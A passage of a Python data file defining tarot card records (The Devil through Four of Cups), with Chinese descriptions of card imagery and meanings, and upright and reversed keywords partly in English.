init=False) the_devil: TarotCard = field(default=TarotCard( id=15, index='the_devil', type='major_arcana', orig_name='The Devil (XV)', name='恶魔', intro='在恶魔牌上,我们看到和恋人相似的构图,只是恋人牌的天使在这里换成了恶魔,而亚当夏娃已然沉沦,上天的祝福变成了诅咒。\n\n牌中的恶魔有蝙蝠翅膀、羊角、羊腿和鸟足,象征动物的本能与天性。牠的驴耳则代表固执。恶魔头上的倒立星币,顶端指向地面,代表物质世界。恶魔右手向上摆出黑魔法的手势,与教宗的祝福手势形成对比。手心的符号代表土星,限制与惰性之星,也是魔羯座的守护星。恶魔左手则持着火炬,同样向下导引到物质世界,似乎在煽动亚当的欲望。注意恶魔坐的地方并不是三度空间的立方体,而是二度空间的长方形,象征人们只看见感官所见的现实,却非全部的真实,好比瞎子摸象。前方的亚当夏娃同样长出角和尾巴,显露出野兽本能。亚当的尾巴尖端是朵火焰,夏娃则是葡萄,都是恋人牌树上结的果实,表示她们误用了天赋。两个人被铁链锁住,乍看无处可逃,但仔细一看,其实系在她们脖子上的链子非常的松,只要愿意,随时可以挣脱,但她们却没有,表示这个枷锁是他们自己套在自己身上的。恶魔牌背景全黑,光芒不存,代表精神上的黑暗。', words='诱惑', desc='魔鬼牌代表错以为别无选择。\n\n魔鬼牌代表一种错误的概念,认为事情别无选择。觉得“我所拥有的就是这些”或“这是我唯一的选择”。在宗教的前因后果当中,魔鬼引诱男人使它遗忘掉精神的探索,以及他的神圣目的。在一般性的占卜中,魔鬼代表一种控制生命的需求,你对与自己的可能性缺乏完整的关照。\n\n魔鬼牌描述的是一种对生命物质化的观点,或像王尔德(OscarWilde)所说的:“知道所有东西的价格,却不知道任何东西的价值。”它可能暗示在某种状况内受到限制,却不愿意去改变。它是一种“偷鸡摸狗胜过杀人放火”的态度。', upright='不伦之恋、不正当的欲望、受诱惑的、违反世俗约定的、不道德的、有特殊的艺术才能、沉浸在消极里、沉溺在恐惧之中的、充满愤怒和怨恨、因恐惧而阻碍了自己、错误的方向、不忠诚的、秘密恋情。', reversed='解脱了不伦之恋、挣脱了世俗的枷锁、不顾道德的、逃避的、伤害自己的、欲望的化解、被诅咒的、欲望强大的、不利的环境、盲目做判断、被唾弃的。' ), init=False) the_tower: TarotCard = field(default=TarotCard( id=16, index='the_tower', type='major_arcana', orig_name='The Tower (XVI)', name='塔', intro='一座位于山巅上的高塔,被雷击中而毁坏,塔中两人头上脚下的坠落。塔顶有个王冠受雷殛而即将坠落。塔象征物质,王冠象征统治和成就,也代表物质与财富,受雷一殛,便荡然无存。天上的落雷是直接来自上帝的语言,两旁的火花有二十二个,象征塔罗二十二张大牌。灰色的云降下灾难之雨,不分性别阶级,平等的落向每一个人。背景全黑,这是一段黑暗的时期。', words='毁灭', desc='高塔象征生命中无可避免的改变。\n\n这种改变是是从根基到顶端的完全崩解与毁灭,是一种无可挽救的崩溃。这种改变是突然而来的,有时候激烈无比,这是一种易于顺从而难以抗拒的改变。当高塔牌出现时,便是到了改变的时刻。现在再来为改变做准备,或选择如何改变都已太迟,现在你需要做的就是丢掉旧东西。', upright='双方关系破裂、难以挽救的局面、组织瓦解了、损失惨重的、惨烈的破坏、毁灭性的事件、混乱的影响力、意外的发展、震惊扰人的问题、悲伤的、离别的、失望的、需要协助的、生活需要重建的。', reversed='全盘覆没、一切都已破坏殆尽、毫无转圜余地的、失去了、不安的、暴力的、已经遭逢厄运了、急需重建的。' ), init=False) the_star: TarotCard = field(default=TarotCard( id=17, index='the_star', type='major_arcana', orig_name='The Star (XVII)', name='星星', 
intro='一位赤裸的金发女子,左膝跪在象征显意识的地面上,右脚踏在象征潜意识的池水里。她左右手各持一个水壶,壶中装的是生命之水,她右手壶的水倾倒入池,激起阵阵涟漪,左手壶的水则倒在青翠的草地上,分成象征人类五种感官的五道水流,其中一道又流回池塘,再度充实潜意识之泉。她身后有棵树,树上有只象征智慧的朱鹭,同时也代表埃及神话中的托特之神,是所有艺术的创造者。女子的后方则是一大片广阔开满花的草原,和一座山脉,天空一颗巨大的金色八角星,七颗白色的小八角星则环绕在四周。', words='希望', desc='星星牌意味创造力和对生命的可能性的信心。\n\n星星是一张代表重新点燃希望的牌。它代表相信明天会更好的内在信心。你可以直接体验潜意识,而不是它的种种符号或意象。你可以体验这种强而有力的能量,并将它导入你的生命中。例如,艺术家利用这种能量来工作,以创作某些足以触动观赏者心情和灵魂的作品。它是一张代表信心、希望和内在平静的牌。', upright='未来充满希望的、新的诞生、无限的希望、情感面精神面的希望、达成目标的、健康纯洁的、美好的未来、好运即将到来、美丽的身心、光明的时机、平静的生活、和平的处境。', reversed='希望遥遥无期的、失去信心的、没有寄托的未来、失去目标的、感伤的、放弃希望的、好运远离的、毫无进展的、过于虚幻、假想的爱情运、偏执于理想、希望破灭的。' ), init=False) the_moon: TarotCard = field(default=TarotCard( id=18, index='the_moon', type='major_arcana', orig_name='The Moon (XVIII)', name='月亮', intro='相较于其它的牌,月亮整体呈现的图面经常令人感到诡异。近景是一只龙虾爬出池塘的景象,龙虾象征比恐惧和兽性更深的情绪,伟特说牠总是爬到一半又缩回去。中景处有频频吠叫的一只狗和一匹狼,分位于左右两边,分别象征人类内心中已驯化和未驯化的兽性。中间有一条通往两塔之间,延伸向远处山脉的小径上,这条小径是通往未知的出口,只有微弱的月光映照着。一轮月亮高挂空中,总共有三个层次,最右边的是新月,最左边的是满月,而中间的女人脸孔则是伟特所谓的“慈悲面”,从新月渐渐延伸向满月,越来越大。月亮的外围则有十六道大光芒,和十六道小光芒,其下有十五滴象征思想之露珠。', words='不安', desc='月亮象征倾听你的梦,以找到内心世界的平静。\n\n想象是相当强而有力的,它可以让内心很快的产生和平、和谐和欢乐;它也可以以同样快的速度产生痛苦、惊惧、悲伤和愤怒。月亮是一张代表梦和想象的牌。梦是转化为意象的潜意识能量。当这股能量强烈到无法被吸收或理解时,可能会导致狂野的梦、噩梦,甚至疯狂。月亮牌所代表的潜意识恐惧,必须由我们单独去面对。\n\n月亮代表强烈的梦想和经由梦传达到你意识思想中的直觉。强而有力的梦企图告诉你某些事情。倾听你的梦,你将会发现你所要找寻的答案。', upright='负面的情绪、不安和恐惧、充满恐惧感、阴森恐怖的感觉、黑暗的环境、景气低落、白日梦、忽略现实的、未知的危险、无法预料的威胁、胡思乱想的、不脚踏实地的、沉溺的、固执的。', reversed='度过低潮阶段、心情平复、黑暗即将过去、曙光乍现、景气复甦、挥别恐惧、从忧伤中甦醒、恢复理智的、看清现实的、摆脱欲望的、脚踏实地的、走出谎言欺骗。' ), init=False) the_sun: TarotCard = field(default=TarotCard( id=19, index='the_sun', type='major_arcana', orig_name='The Sun (XIX)', name='太阳', 
intro='可爱的裸体孩童骑在马背上,跨越灰色的围墙,脸上带着微笑。\n\n孩童头上戴着雏菊花环,以及一根红色的羽毛。这根羽毛就是在愚人与死神出现的同一根,象征太阳牌已经跨越了死亡的界限,而重获新生。围墙后面种满向日葵,里头是一座人造的花园,而孩童跃离了花园,代表他不需要这些人工的产物,他是最纯真、自然、不需隐藏的,如同他一丝不挂的身体。向日葵共有四朵,象征四要素昂与小阿尔克那的四个牌组。有趣的是,四朵向日葵是向着孩童,而不是太阳,表示这位快乐的孩童已经拥有足够的能量。马匹背上没有马鞍,孩童不用缰绳控制牠,甚至连双手也不用,显示马匹象征的能量已经受到充分控制。孩童左手持着红色旗帜,左手象征潜意识,红色旗帜象征行动,表示他已经不用像战车那样用象征意识的右手来掌控,他可以轻而易举、自然的控制一切。背景的太阳是生命的源头,万物赖以维生之源,总共有21道光芒,代表愚人以外的21张大阿尔克那,仔细一看在上方罗马数字的旁边有一道黑色的曲线光芒,代表愚人(另有一说是太阳中心圆形的部分是愚人)。这样的更改是为了避免原本的暧昧。', words='生命', desc='太阳象征欢乐、内在的平和,以及表达自我的需求。\n\n它也代表理解到幸福是一种选择。太阳代表一种令人愉悦的解脱。它表示觉醒的力量足以驱逐黑暗。它代表一种表达内在无意识和潜意识力量的天赋趋力。它是充满希望、理想主义,以天真率直的。\n\n太阳象征欢乐和内在平静,而且感觉宇宙是一个充满乐趣和创造性的地方。太阳是自由的充分显现。它从意识层心智的日常限制中彻底解放,转为一种开放、觉醒及自由状态。它是一种可以带来肉体自由的内心自由。太阳显示出欢乐、和平、幸福及有创意的生活态度,并且深深体会到生命之美。', upright='前景看好的、运势如日中天的、成功的未来、光明正大的恋情、热恋的、美满的婚姻、丰收的、事件进行顺畅的、物质上的快乐、有成就的、满足的生活、旺盛。', reversed='热情消退的、逐渐黯淡的、遭遇失败的、分离的、傲慢的、失去目标的、没有远景的、失去活力的、没有未来的、物质的贫乏、不快乐的人生阶段。' ), init=False) judgement: TarotCard = field(default=TarotCard( id=20, index='judgement', type='major_arcana', orig_name='Judgement (XX)', name='审判', intro='天使加百列(Gabriel)在空中居高临下吹号角,号角口处有七条放射状的线,象征七个音阶,能够将人类从物质世界的限制解放出来,并且疗愈人们的身心。\n\n喇叭绑着一张正方形红十字旗帜,象征业力的平衡。天使下方是个象征潜意识的海洋,在女祭司帘幕后面就曾出现过,如今已接近终点。海洋上漂浮着许多载着人的棺材,棺材象征物质世界的旧模式。棺材中人全都是灰色的,其中最显眼的是一位象征显意识的男性,含蓄地仰望天使;一位象征潜意识的女性伸出双手,大方迎接天使的呼唤;以及象征重生人格的小孩,背对着我们。远处则是白雪霭霭的高山,伟特说这是抽象思考的顶峰。', words='复活', desc='审判象征清晰的判断力。\n\n审判牌意指你对人生的老旧观念已经死亡,你正在接受内心的召唤,去过一种更有意义的生活。审判牌代表此时你有清晰的判断力。作为问题的答案,这牌暗示你拥有清晰的判断力。此时你理解了你由生命所展示的试炼及挑战中学习到了什么。\n\n审判牌也可能是在形容你了解你的精神目的,也知道要达成它的必要步骤。它代表你能清楚地看到自己,以及生命的时光。这会使你对如何开始又有何收获,产生莫大的喜悦或惊慌。收成十分就近了,你可以用你的正直和诚实来面对你的报偿。现在你审判你自己,如果你没有得到所希望的,实在也没有藉口可推诿了,因为你收割的正是你努力的产物。', upright='死而复生、调整心态重新来过、内心的觉醒、观念的翻新、超脱了束缚的、满意的结果、苦难的结束、重新检视过去而得到新的启发、一个新的开始、一段新的关系。', reversed='不公平的审判、无法度过考验的、旧事重演的、固执不改变的、自以为是的、对生命的看法狭隘的、后悔莫及的、自责的、不满意的结果、被击垮的。' ), init=False) the_world: TarotCard = field(default=TarotCard( id=21, index='the_world', type='major_arcana', orig_name='The World (XXI)', name='世界', 
intro='终于来到愚人旅程的终点。一位赤裸的舞者自由地在空中跳舞,她外貌看起来虽是女的,但在许多版本的塔罗牌中,她是雌雄同体,象征愚人终于成功将阴阳两股力量融合。\n\n舞者身体缠绕着象征高贵与神圣的紫色丝巾,象征神性其实就在每个人身上。舞者轻柔随意地手持两根权杖,象征进化与退化的力量,她同时具备两者。舞者身旁环绕着一个椭圆桂冠,桂冠象征成功,而它围绕成的椭圆形就像愚人的0号形状,愚人无限的潜力,在世界牌中发挥得淋漓尽致。桂冠上下各有一条红巾缠绕,形成倒8符号,象征无限与永恒,这在魔术师与力量牌都曾出现过。在图中四角有人、老鹰、狮子、牛,这些符号曾经在命运之轮出现过,牠们在命运之轮中还拿著书汲取知识,最后在世界牌中完成使命。', words='达成', desc='世界描述一种来自内心的快乐,它也可能暗示持久的成功。这是一张象征永久和持续成功的牌。你已经到达了成功之门的前方,成功女神让你耐心等待,她会让你进入成功之门的,只不过是时间问题罢了。成功之门周围是你经历过的幸福与哀伤,成功与失败,在到达乐土之前回忆一下过去的时光是很有必要的。这张牌暗示只要你拥有一颗感恩的心,就必能在你为自己打造的美丽世界中,寻找到幸福与快乐。\n\n牌的本意是“达成”,它告诉我们所有的事情都可以达成,所有的梦想都可以成为现实,没有不可能得到的事物。只要有耕耘,就能有相应的收获。', upright='完美的结局、重新开始的、生活上的完美境界、获得成功的、心理上的自由、完成成功的旅程、心灵的融合、自信十足带来成功、生活将有重大改变、获得完满的结果。', reversed='无法完美的、一段过往的结束、缺乏自尊的、感觉难受的、态度悲观的、丑恶的感情、无法挽回的局势、不完美的结局、无法再继续的、残缺的。' ), init=False) ace_of_wands: TarotCard = field(default=TarotCard( id=22, index='ace_of_wands', type='minor_arcana', orig_name='Ace of Wands', name='权杖首牌', intro='一只手从云中伸出,强而有力,握住一根长满绿叶的权杖。那根权杖是如此茂盛,以致鲜嫩的绿叶几乎从杖上“爆”开,有八片叶子脱离权杖,在空中飞舞。遍地青草溪流。远方的城堡似乎暗示着未来成功的可能。', words='行动', desc='权杖首牌暗示这是一个好的开始,放开手脚勇敢做。\n\n权杖首牌表示实践计划的能量和欲望。权杖首牌象征一个计划强而有力的开始,代表着手新计划的渴望、力量与勇气。这张牌推出已经开始的行动,而且一定会产生具体的结果,与纸上谈兵完全不同。首牌出现在采取行动的时候,他们不是代表任何的计划于决定,而是发动新事物的具体行为。', upright='Creation, Willpower, Inspiration, Desire, Creative spark, New initiative, New passion, Enthusiasm, Energy', reversed='Lack of energy, Lack of passion, Boredom, Delays, Blocks, Hesitancy, Creative blocks' ), init=False) two_of_wands: TarotCard = field(default=TarotCard( id=23, index='two_of_wands', type='minor_arcana', orig_name='Two of Wands', name='权杖二', intro='一位身穿领主服装的男子,站在他的城墙上,俯视他的辽阔领土,遥望远方海洋。他右手拿着一颗类似地球仪的球体,左手扶着一根权杖。右边的权杖则是被铁环系在墙上。城墙上有个白百合与红玫瑰交叉的图案,白百合象征纯洁的思想,红玫瑰象征热情,暗示两者之间必须取得平衡。', words='决定', desc='权杖二意味着一个决定。\n\n权杖二并不代表具体的行动,而是决定本身,通常是身体上的决定。行动是由权杖一所代表。在决定行动之前,权杖二代表对选择的评估,它是你所习惯的东西与你所想拥有的东西之间的一个抉择。\n\n权杖二暗示因成长而不满当前环境,需要决定未来行动方向的时机。他表示你目前所拥有的事实是不够的,你将决定下一步要怎么做。', upright='Planning, Making decisions, Leaving home, First steps, Leaving comfort, Taking risks', reversed='Fear of change, 
Playing safe, Bad planning, Overanalyzing, Not taking action, Playing it safe, Avoiding risk' ), init=False) three_of_wands: TarotCard = field(default=TarotCard( id=24, index='three_of_wands', type='minor_arcana', orig_name='Three of Wands', name='权杖三', intro='山巅上站着一个成功的商人,三根权杖笔直地竖立在地面上,商人右手握着其中一根,目送自己的贸易船出海。天空是鲜明的黄色,海映着天,也是黄色。', words='远见', desc='权杖三意味着面向远方,你的未来在你的眼光里。\n\n权杖三可以表示旅行或将计划付诸实行。可以代表当你寻求自我内在意义的时候,你仍可保持相对的沉静;表示你一边在扩展自身内在于外的新大道与利益,一边在维持一种平衡的状态。权杖三同时也暗示你正在考虑你最近的状况,并且寻找你内在与外在的意义。', upright='Looking ahead, Expansion, Rapid growth, Momentum, Confidence, Growth, Foresight', reversed='Obstacles, Delays, Frustration, Restriction, Limitations, Lack of progress' ), init=False) four_of_wands: TarotCard = field(default=TarotCard( id=25, index='four_of_wands', type='minor_arcana', orig_name='Four of Wands', name='权杖四', intro='四根巨大的权杖耸立在前方,其上挂着象征胜利的花环。两位女子手持花束高举头顶欢庆舞蹈着,远方隐约可见庆祝的人群,呈现一幅和谐且繁荣的景象。右边有护城河上有座桥,通往远方的表示稳固庄园城堡。', words='稳定', desc='权杖四意味着坚定牢固的合作。\n\n权杖四描出一个坚固的家庭或工作环境,欢乐与分享是每天生活的一部分。权杖四代表坚固,将权杖三中所决定的计划变得稳固或实在的行为。它经常暗示搬入新家或换工作,也表示你在目前的环境中安定下来。', upright='Community, Home, Celebration, Celebrations, Reunions, Parties, Gatherings, Stability, Belonging', reversed='Lack of support, Transience, Home conflicts, Instability, Feeling unwelcome, Lack of roots, Home conflict' ), init=False) five_of_wands: TarotCard = field(default=TarotCard( id=26, index='five_of_wands', type='minor_arcana', orig_name='Five of Wands', name='权杖五', intro='迥异于权杖四的和谐稳定局面,权杖五呈现一群年轻人混战的场面。每个人手上都拿着一根杖,彼此僵持不下,谁也不让谁。伟特说:这是一场模仿的战役。', words='冲突', desc='权杖五暗示缺乏和谐或者内在的冲突。\n\n权杖五是一张代表冲突的牌,虽然冲突不至于伤害任何人,但却是所有人全盘卷入。只是权杖类型的天性,总是把生活看成战争,因为如果没有障碍,就没有冒险了。而从另外一方面来看,这张牌比较可以形容成比较,较量,竞争。', upright='Competition, Rivalry, Conflict, Arguments, Aggression, Tension, Rivals, Clashes of ego', reversed='Avoiding conflict, Respecting differences. 
end of conflict, Cooperation, Agreements, Truces, Harmony, Peace' ), init=False) six_of_wands: TarotCard = field(default=TarotCard( id=27, index='six_of_wands', type='minor_arcana', orig_name='Six of Wands', name='权杖六', intro='一位年轻男子,戴着胜利的桂冠,骑着白马凯旋而归。四周都是围绕簇拥着他的群众。白色代表纯洁,马象征力量。红色的外衣象征积极主动与热忱。男子手持的权杖饰以胜利花环。艰辛奋斗已然过去,他现在抬头挺胸,享受属于他的荣耀时刻。', words='自信', desc='权杖六暗示着对人生充满自信的态度。\n\n在这张牌中,火的乐观主义使其欲求和期望得到成功。这不是错误的乐观主义或虚无的期待,而是来自过去的成功及自信的一种真正的信仰。权杖六也表示工作的升迁、证实达成目标,或仅是一种自信的生活态度。', upright='Victory, Success, Public reward, Triumph, Rewards, Recognition, Praise, Acclaim, Pride', reversed='Excess pride, Lack of recognition, Punishment, Failure, No rewards, Lack of achievement' ), init=False) seven_of_wands: TarotCard = field(default=TarotCard( id=28, index='seven_of_wands', type='minor_arcana', orig_name='Seven of Wands', name='权杖七', intro='绿衣男子站在青葱的山顶上,手持权杖,奋力迎击敌人从山下攻上的六根权杖。他高举右手,表情坚毅。', words='挑战', desc='权杖七暗示经由坚韧不拔而获得的成功。\n\n权杖七表示你需要更大的挑战。权杖七的讯息是“不要放弃”。继续努力前进,你将得到成功的回报。你投注于完成目标的体力与行动,将是值得的。', upright='Perseverance, Defensive, Maintaining control, Protectiveness, Standing up for yourself, Defending yourself, Protecting territory', reversed='Give up, Destroyed confidence, Overwhelmed, Giving up, Admitting defeat, Yielding, Lack of self belief, Surrender' ), init=False) eight_of_wands: TarotCard = field(default=TarotCard( id=29, index='eight_of_wands', type='minor_arcana', orig_name='Eight of Wands', name='权杖八', intro='八根权杖整齐划一的在空中航行,背景是蔚蓝的天空与青翠的山丘平原,还有一条宁静的小溪流过。', words='自由', desc='权杖八意味旅行及自由流动的能量。\n\n权杖八代表了海外旅行、自由流动的能量,以及达成目标的清晰路径。过去的努力就是在为现在的人生可以自由的旅行而铺路。权杖八表示你的目标清楚可见,而且正轻松的向它们迈进。这点可以从八根权杖自由而无约束的掠过天际看出来。权杖八没有拘束的本性反映了这是很少阻碍的时机。它表示你是自由的、可投注热情、直接追求目标。', upright='Rapid action, Movement, Quick decisions, Speed, Progress, Sudden changes, Excitement', reversed='Panic, Waiting, Slowdown, Slowness, Chaos, Delays, Losing momentum, Hastiness, Being unprepared' ), init=False) nine_of_wands: TarotCard = field(default=TarotCard( id=30, index='nine_of_wands', type='minor_arcana', 
orig_name='Nine of Wands', name='权杖九', intro='一个壮汉靠着长杖,似乎在等待着什么。他的头上扎绷带,显示他在过去战役中曾经受伤,尚未复原。但他并不畏惧,仍然紧锣密鼓等待着敌人的下一波来袭。他身后竖立八根权杖,井井有条,像是栅栏,包围着壮汉所守护的家园。', words='谨慎', desc='权杖九暗示重新评估目前承诺的时候。\n\n对于既存的问题纵是期待将来能够解决,现在这个人开始回顾过去的作为,以便看清他是怎么走到今天的。他已经渐渐知道所有行为都会产生结果,就好比他目前的生活就是过去作为的结果,而将来的生活则是由现在的决定和作为来引导的。\n\n这张牌代表逐渐意识到聚焦于承诺和目的是多么重要的事了。与其栽种五百颗混合的种子来期待有好的结果,不如仔细评估只耕耘一种特殊的品种,并且悉心照料它们,以享受耕耘后的收获。', upright='Resilience, Grit, Last stand, Persistence, Perseverance, Close to success, Fatigue', reversed='Exhaustion, Fatigue, Questioning motivations, Stubbornness, Rigidity, Defensiveness, Refusing compromise, Giving up' ), init=False) ten_of_wands: TarotCard = field(default=TarotCard( id=31, index='ten_of_wands', type='minor_arcana', orig_name='Ten of Wands', name='权杖十', intro='一个男人奋力的扛着十根沉重的权杖,朝着远方的房子前进。他被权杖的重量压得喘不过气,疲累万分,但他仍不愿放弃,为了生活,一步一脚印的往前走。', words='责任', desc='权杖十暗示一个委任某些责任的时机。\n\n权杖十描绘暗示一个委任某些责任的时机。他被这些权杖给压的沉下去,而且它们也遮住了他的方向(即远方的房子)。他急切地想要涉入这么多的情况当中,结果,因为种种承诺和问题而不胜负荷。权杖十通常伴随着一种态度:“如果你想妥适的完成它,你就要自己做。你觉得身负重任,所以不能去信任别人也能完成这件工作。\n\n尽管负担重重,然而权杖十代表你在付出极大努力后所获得的成功。或许你会因为交付出去某些责任而受惠,因为那会减轻你的压力,并且用时间去深思长期以来的憧憬。当你实现目标时。你有充分的理由为你的成就感到骄傲,因为权杖是证实了,要梦想成真就需要坚持和努力。', upright='Accomplishment, Responsibility, Burden, Duty, Stress, Obligation, Burning out, Struggles', reversed='Inability to delegate, Overstressed, Burnt out, Failure to delegate, Shouldering too much responsibility, Collapse, Breakdown' ), init=False) page_of_wands: TarotCard = field(default=TarotCard( id=32, index='page_of_wands', type='minor_arcana', orig_name='Page of Wands', name='权杖侍从', intro='权杖侍从把权杖拄在地上,好奇地看着杖顶,好像在研究什么东西。他的服装是明亮的鲜黄色,外衣上有权杖家族图腾火蜥蜴,有些蜥蜴的嘴没有真正咬到尾巴,形成不完整循环,但有些却有。牌的背景是沙漠和三个金字塔。', words='开始', desc='权杖侍从象征新的挑战,新的消息,跃跃欲试的梦想。\n\n权杖侍从意指该是开始某些新事物的时候了。它是展开一项新方案或旅行(如果有其他旅行牌出现在牌局中)的行动,且将指引你一个新方向。权杖侍从牌描述当开始一项新的事业时,一种可以感觉到年轻活力的行动。虽然对于行动会感到紧张,但是他仍然充满激情和热心,热衷于探索有用的经验以及展开新的冒险。', upright='Exploration, Excitement, Freedom, Adventure, Fresh ideas, Cheerfulness, Energetic, Fearless, Extroverted', reversed='Lack of direction, 
Procrastination, Creating conflict, Hasty, Impatient, Lacking ideas, Tantrums, Laziness, Boring, Unreliable, Distracted' ), init=False) knight_of_wands: TarotCard = field(default=TarotCard( id=33, index='knight_of_wands', type='minor_arcana', orig_name='Knight of Wands', name='权杖骑士', intro='权杖骑士骑着健马,高举权杖,表情自信地看着远方。他穿着明亮黄色服装,上面同样有权杖的家族象征火蜥蜴,但蜥蜴的嘴没有触碰到尾巴,形成一个不完整的循环。骑士的头盔顶端和背後都饰着红色的长穗,还戴着红手套,他以左手拉着缰绳,健马的前蹄高高举起。远方背景中出现三座金字塔,金字塔呈现在马脚的下方。', words='改变', desc='权杖骑士象征充满活力,信心满满的迎接改变。\n\n充满活力,信心满满的迎接改变。权杖骑士所代表的是火元素当中的火元素。这张牌可以象征行动、旅行、改变以及为了自身缘故的活动。看得出来权杖骑士正在思考未来的行动,骑士正全神贯注于对向往目标的积极追求。这张牌经常代表一种态度——完成某件事情唯一的办法就是自己动手做。瞄一眼这张牌就会得到火、活动、热情及活力的印象。权杖骑士暗示需要挑战、爱好旅游和学习,并有教学的能力。', upright='Action, Adventure, Fearlessness, Courageous, Energetic, Charming, Hero, Rebellious, Hot tempered, Free spirit', reversed='Anger, Impulsiveness, Recklessness, Arrogant, Reckless, Impatient, Lack of self control, Passive, Volatile, Domineering' ), init=False) queen_of_wands: TarotCard = field(default=TarotCard( id=34, index='queen_of_wands', type='minor_arcana', orig_name='Queen of Wands', name='权杖皇后', intro='权杖皇后戴着盛开绿叶的王冠,穿着阳光般金黄服饰,坐在宝座上。她的体态强健。她的左手拿着一朵向日葵,她的右手持权杖,眼光向左望。宝座的扶手是两只狮子,后面悬吊的帷幕上,再度出现火象的狮子图腾和向日葵。她前方有一只黑猫守护,这里的黑猫似乎也在保护权杖皇后,使她免于受伤害。远方有三座金字塔,天空则是一片既明亮又祥和的浅蓝色。', words='决心', desc='权杖皇后代表心灵的强大,透过内在力量而达到成功。\n\n权杖皇后牌可以说是透过内在的力量和自信而获得成功的。当你面对逆境时勇气会帮助你达成目标。相信你所做的事,以及做你所相信的事,可以帮助你了解你的目标。', upright='Courage, Determination, Joy, Confident, Self-assured, Passionate, Determined, Social, Charismatic, Vivacious, Optimistic', reversed='Selfishness, Jealousy, Insecurities, Demanding, Vengeful, Low confidence, Jealous, Selfish, Temperamental, Bully' ), init=False) king_of_wands: TarotCard = field(default=TarotCard( id=35, index='king_of_wands', type='minor_arcana', orig_name='King of Wands', name='权杖国王', intro='权杖国王坐在宝座上,身躯稍微向前倾,好像随时准备出发。他右手持权杖,杖上长有新鲜的绿叶。宝座和披风饰以狮子和火蜥蜴,地上还有一只火蜥蜴陪伴着他。', words='稳重', 
desc='权张国王代表经由自律而成功。\n\n权杖国王代表热忱坚定,魄力十足,经由自律而成功。他为人诚实、积极而坦率,而且经常愿意接受新挑战。他认为过程比结果还重要,而且拒绝任何拖泥带水的挑战。权杖国王描绘一个强壮的人,能够透过他的意志力来领导及统御别人。他对自己有坚强的信念,因为他的信心是建立在自身的经验上。他知道他的方法有效,因为他尝试过也试验过这种方法。自律可以让你超越自己,因此逆就会有充分的时间和体力来掌握更好的机会,让你完成已着手之事。', upright='Big picture, Leader, Overcoming challenges, Leadership, Vision, Taking control, Daring decisions, Boldness, Optimism', reversed='Impulsive, Overbearing, Unachievable expectations, Forceful, Domineering, Tyrant, Vicious, Powerless, Ineffective, Weak leader' ), init=False) ace_of_cups: TarotCard = field(default=TarotCard( id=36, index='ace_of_cups', type='minor_arcana', orig_name='Ace of Cups', name='圣杯首牌', intro='圣杯首牌是所有小牌的一号牌中最富象征意义的。图中的圣杯就是耶稣在最后晚餐中使用的杯子,杯上有个倒立的M字母。据说,在耶稣死后,他的鲜血就是由这个圣杯所承装着。\n\n白鸽是天主教中圣灵的象征,牠衔着象征耶稣身体的圣饼,自上而下彷佛要进入杯中。杯中有五道水涌出,下方的水面平静,只有少许涟漪,睡莲处处,睡莲茎长,向上伸展至水面。二十五滴水珠从四面落下,飘浮在空中。一只手从云中伸出,这只手和权杖一与宝剑一中的手截然不同,它是轻轻的捧着圣杯,而非用力抓住圣杯。', words='情感', desc='圣杯首牌意味情感的连接和满足。\n\n圣杯首牌正位是人际关系最好的开始,经常代表新感情的开端,对于人际关系是非常好的征兆。相对于权张首牌所代表的肉体上、体力上的开始,它暗示你已打开心扉接受新机会。它可能是一段新的两性关系,或既存关系的新阶段,或一种新层次的满足。此时正是你感觉情感满足的时刻。首牌描述的是透过感情和生活产生连接。你可能正经验着正立首牌的满足感或满意感。或许你正展开一项你全心期待的计划,或是一次旅行。', upright='New feelings, Spirituality, Intuition, Love, Emotional awakening, Creativity', reversed='Emotional loss, Blocked creativity, Emptiness, Coldness, Feeling unloved, Gloominess' ), init=False) two_of_cups: TarotCard = field(default=TarotCard( id=37, index='two_of_cups', type='minor_arcana', orig_name='Two of Cups', name='圣杯二', intro='一男一女面对彼此,向对方持杯致意。两人头上都戴着花环,男人身躯微微向前,左脚踏出,右手也伸向女人,而女人站姿端凝如山。他们中间浮着一根两条蛇缠绕的杖,称为“赫米斯之杖”,是治疗的象征。杖上的狮子头象征沟通,而两片翅膀象征圣灵,使人联想到恋人牌中的天使。远方是一座城镇。', words='平等', desc='圣杯二意指一种平等的伙伴关系或两性关系。\n\n圣杯二意指一种心灵上的契合。它形容一种既丰富又有创意的友谊或两性关系。其实,圣杯二讲的就是这两种力量的结合,若能同时拥有两种力量,且融合良好的话,会比单一力量更强大。当牌局中出现此牌时,它意味着连结你和对方的特质,那么你可能会获得某些比你单打独斗的成就还要来得大的东西。', upright='Unity, Partnership, Connection, Attraction, Close bonds, Joining forces, Mutual respect', reversed='Imbalance, Broken communication, Tension, Separation, Rejection, Division, Bad communication, Withdrawal' ), 
init=False) three_of_cups: TarotCard = field(default=TarotCard( id=38, index='three_of_cups', type='minor_arcana', orig_name='Three of Cups', name='圣杯三', intro='三个女子紧靠彼此,围成圆圈,高举圣杯互相庆贺。她们头上都戴着象征丰收的花圈,穿着色彩艳丽的袍子,脸上幸福洋溢。四周有藤蔓、葫芦及南瓜,一位女子手上提着一串葡萄,这些植物很容易让人联想到丰收的时节。这三位女子分别有不同颜色的头发与眼珠,穿戴的衣服花环也都各有不同,代表她们都是独立的个体,有独立的个性,但是,在这个团体中,她们都能尊重彼此,敬爱彼此。三人围成圆圈的型态,表示她们之间没有尊卑之分,在这个欢庆的场合里,每个人都是如此平等。', words='团聚', desc='圣杯三意味庆贺或重聚。\n\n圣杯三意指欢乐、分享或庆贺。圣杯三是一张代表庆祝、团圆或当所有参与者带来欢乐的一场聚会。这杖牌可一暗示由三人或更多的人来分享成功。圣杯三意味着一段庆祝的时光,一群志同道合的人们相聚,或代表这是个重大隆盛的晚宴。\n\n圣杯三也经常代表欢庆的场合,举凡各种宴会、聚餐、婚礼、弥月、尾牙、庆功宴等都算在内。其丰收的涵义表示事情有了好的结果,不管过程曾经有多艰辛。因此,圣杯三象征丰收的时节,长久的辛苦终于开花结果,获得成功。', upright='Friendship, Community, Happiness, Gatherings, Celebrations, Group events, Social events', reversed='Overindulgence, Gossip, Isolation, Scandal, Excess, Loneliness, Solitude, Imbalanced social life' ), init=False) four_of_cups: TarotCard = field(default=TarotCard( id=39, index='four_of_cups', type='minor_arcana', orig_name='Four of Cups', name='圣杯四', intro='一个男人百无聊赖地坐在树下,双眼紧闭,双手双脚合在一起,形成防御的姿态。他前方三个杯子象征他过去的经验。云中伸出一只手给他第四个杯子,他却视而不见,独自沉浸在自己的世界中。', words='不满', 